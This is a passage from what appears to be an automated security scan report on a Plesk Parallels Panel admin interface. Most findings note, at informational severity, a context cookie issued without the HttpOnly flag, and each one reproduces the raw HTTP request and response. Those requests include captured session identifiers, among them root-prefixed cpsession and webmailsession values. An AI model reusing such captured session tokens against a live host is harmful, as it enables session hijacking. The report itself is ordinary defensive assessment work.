GET /admin/customer/list?context=customers HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 18:57:50 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 18:57:52 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 18:57:52 GMT Server: sw-cp-server Content-Length: 17559
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/list/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/list/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:16:00 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:00 GMT Server: sw-cp-server Content-Length: 16547
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.10. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/list/reset-search/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/list/reset-search/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:16:00 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:00 GMT Server: sw-cp-server Content-Length: 16316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.11. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/true/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/list/reset-search/true/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/list/reset-search/true/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 14:16:54 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:54 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:54 GMT Server: sw-cp-server Content-Length: 16316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.12. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/login-info/id/4previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/login-info/id/4
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/login-info/id/4 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4 Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 16:03:01 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 16:03:01 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 16:03:01 GMT Server: sw-cp-server Content-Length: 10366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.13. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/overview/id/4
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/overview/id/4 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list?context=customers Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 16:02:47 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 16:02:47 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 16:02:47 GMT Server: sw-cp-server Content-Length: 21835
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.14. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/personal-info/id/4previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/personal-info/id/4
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/personal-info/id/4 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4 Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 16:02:52 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 16:02:52 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 16:02:52 GMT Server: sw-cp-server Content-Length: 28591
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.15. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/domain/listpreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/domain/list
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=domains; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/domain/list?context=domains HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=customers
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:11:07 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:11:07 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=domains; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:11:07 GMT Server: sw-cp-server Content-Length: 10295
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.16. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/health/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=health; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/health/?group=Services HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:00:01 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:00:02 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=health; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:00:02 GMT Server: sw-cp-server Content-Length: 7263
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.17. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller-self/subscription-overview/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller-self/subscription-overview/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller-self/subscription-overview/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:13:38 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:13:38 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=deleted; expires=Fri, 24-Sep-2010 14:13:37 GMT; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:13:38 GMT Server: sw-cp-server Content-Length: 22558
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.18. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/listpreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/list
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=resellers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/list?context=resellers HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=customers
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:11:49 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:11:49 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=resellers; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:11:49 GMT Server: sw-cp-server Content-Length: 14689
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.19. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/reset-search/true/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/list/reset-search/true/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=resellers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/list/reset-search/true/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BarExpanded=True; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; locale=en-US; psaContext=home
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:42:20 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:42:20 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=resellers; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:42:21 GMT Server: sw-cp-server Content-Length: 14643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.20. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/login-info/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/login-info/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=credentials-info; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/login-info/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:13:35 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:13:36 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=credentials-info; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:13:36 GMT Server: sw-cp-server Content-Length: 9896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.21. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/personal-info/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=personal-info; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/personal-info/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=customers
Response
